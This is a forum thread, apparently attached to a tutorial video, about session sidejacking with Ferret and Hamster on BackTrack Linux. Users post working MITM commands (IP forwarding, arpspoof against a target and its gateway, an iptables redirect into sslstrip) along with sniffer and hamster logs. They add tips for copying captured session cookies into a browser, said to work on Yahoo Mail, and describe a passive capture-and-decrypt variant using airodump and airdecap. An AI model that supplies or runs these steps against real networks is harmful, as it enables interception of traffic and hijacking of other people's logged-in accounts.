[Video] Session Sidejacking (Ferret and Hamster)

[virusss]

Works like a charm...


Just a few things to mention for further reference:

It works mostly on home networks or very poor configured Business Networks so don't expect to spoof easily any Network ( especially where a Switch layer 3 by Cisco is involved).

You can also edit cookies sessions in you browser so if it's asking to login and you used sslstrip try to look for valid cookies. In my case sslstrip didn't start but I was able to copy manually some cookies and replace them in my browser ( use an addon for Firefox or Opera which has a cookie editor).
I tried for https://mail.yahoo.com and it worked just fine....+ some other sites on http.

Good Luck!

[g0tmi1k]

hi sorry for the late reply, i am using persistent live cd BT4 final, i have updated everything recently using the apt-get cmd

i fixed the LLC error by changing to my alfa card rather then using my internal wireless card..

here is my log:
1st window:
echo 1 > /proc/sys/net/ipv4/ip_forward

root@bt:~# arpspoof -i wlan1 -t 192.168.1.107 192.168.1.117
0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34
0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34

2nd window:
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@bt:~# sslstrip -p -k -f

sslstrip 0.6 by Moxie Marlinspike running...

3rd window: (this is where it starts going wrong i think)
-- Sniffing on interface "wlan1"
SNIFFING: wlan1
LINKTYPE: 1 Ethernet
ID-IP=[192.168.1.117], macaddr=[00:c0:ca:37:a8:34]
ID-MAC=[00:c0:ca:37:a8:34], ip=[192.168.1.117]
Traffic seen
ID-IP=[192.168.1.107], macaddr=[00:23:6c:89:04:73]
ID-MAC=[00:23:6c:89:04:73], ip=[192.168.1.107]
ID-IP=[192.168.1.1], Device="UPnP", LOCATION="http://192.168.1.1:5000/rootDesc.xml"
ID-IP=[192.168.1.1], Device="UPnP", SOFTWARE="Tomato UPnP/1.0 MiniUPnPd/1.4"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="upnp:rootdevice"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:InternetGatewayDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANConnectionDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANDevice:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANIPConnection:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANPPPConnection:1"
ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:Layer3Forwarding:1"
ID-IP=[192.168.1.1], macaddr=[00:1c:10:11:bc:17]
ID-MAC=[00:1c:10:11:bc:17], ip=[192.168.1.1]
proto="DNS", query="A", ip.src=[192.168.1.117], name="rcv-srv22.inplay.tubemogul.com"
ID-DNS="rcv-srv22.inplay.tubemogul.com", address=[174.129.26.97]
ID-IP=[192.168.1.117], User-Agent="Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)"
proto="HTTP", op="GET", Host="rcv-srv22.inplay.tubemogul.com", URL="/StreamReceiver/services"

4th window :

root@bt:~# /pentest/sniffers/hamster/hamster
--- HAMPSTER 2.0 side-jacking tool ---
begining thread
Set browser to use proxy BackTrack Linux
DEBUG: set_ports_option(1234)
DEBUG: mg_open_listening_port(1234)
Proxy: listening on 127.0.0.1:1234
GET /StreamReceiver/services
GET /StreamReceiver/services HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)
Accept: text/html, image/jpeg, image/png, text/*, image/*, */*
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: rcv-srv22.inplay.tubemogul.com
Connection: close
Referer: http://static.inplay.tubemogul.com/c...erID=B-4SJ-WF8

recv failed: Connection reset by peer
recv failed: Connection reset by peer

i have no idea why it says recv failed: Connection reset by peer...

basically once i got hamster up n running, i proceed to using my 2nd laptop which uses windows 7, i used firefox to log into my gmail account.. then refreshed conquer on my BT4 machine but didnt see the log for that computer in kronquer..
(yes both of my computer r connected to the same network)

hope u can help =)

Try without SSLStrip?

Works like a charm...


Just a few things to mention for further reference:

It works mostly on home networks or very poor configured Business Networks so don't expect to spoof easily any Network ( especially where a Switch layer 3 by Cisco is involved).

You can also edit cookies sessions in you browser so if it's asking to login and you used sslstrip try to look for valid cookies. In my case sslstrip didn't start but I was able to copy manually some cookies and replace them in my browser ( use an addon for Firefox or Opera which has a cookie editor).
I tried for https://mail.yahoo.com and it worked just fine....+ some other sites on http.

Good Luck!

Thanks for the tip!

[pen2paper]

Could someone please help me, I have successfully cracked my WPA key using you'r method g0tmi1k thanks alot, so im guessing my monitoring / injection is working.

I am testing this on xp sp2 with no av or firewall enabled, with BT4 Final.

I am using wlan0 does monitor mode have to be enabled? also do i need to be connected to the same router as my xp machine?

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

is 192.168.1.104 192.168.1.1 the IP address and default gateway of the xp machine? if so which one is first or doesn't it matter. Also wouldn't I do arpspoof -i wlan0 -t 192.168.1.104 192.168.1.1

after folllowing this command

sslstrip -p -k -f

I do not receive the message "sslstrip 0.6 by Moxie Marlinspike running..."

please help

[siviog1]

Tested this using BTr1 on netbook connected to network via wlan0 - host pc was win7- worked like a charm

[g0tmi1k]

Could someone please help me, I have successfully cracked my WPA key using you'r method g0tmi1k thanks alot, so im guessing my monitoring / injection is working.

I am testing this on xp sp2 with no av or firewall enabled, with BT4 Final.

I am using wlan0 does monitor mode have to be enabled? also do i need to be connected to the same router as my xp machine?

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

is 192.168.1.104 192.168.1.1 the IP address and default gateway of the xp machine? if so which one is first or doesn't it matter. Also wouldn't I do arpspoof -i wlan0 -t 192.168.1.104 192.168.1.1

after folllowing this command

sslstrip -p -k -f

I do not receive the message "sslstrip 0.6 by Moxie Marlinspike running..."

please help

Try this:

1. Capture the traffic via airodump.
2. Decrypt via airdecap
3. Use ferret (with the -r [filename])
4. Use hamster

By doing it that way - you don't have to be connect to the access point (because your in monitor mode). Therefore you don't have to worry about what interfaces to use, and doing a ARP attack (using arpspoof)

That's odd about sslstrip - try:

Code:

whereis sslstrip
sslstrip -h

The first command - makes sure it is installed.
The second command - should display "help"

In reply to your arpspoof question:

• the -t bit - your selecting your target. You want to put your targets IP address there.
• The next IP address is the IP address your spoofing (in this case the gateway).
• arpspoof I believe is only doing it one way. e.g. tricking the target your the gateway, NOT the gateway your the target.
• and yes if wlan0 is the interface your connect to the network, you need to use that.

Tested this using BTr1 on netbook connected to network via wlan0 - host pc was win7- worked like a charm

Thanks for feedback. Good to know it still works. (=

[xcool]

Thanks your video. I am happy to watch it! Hope more video!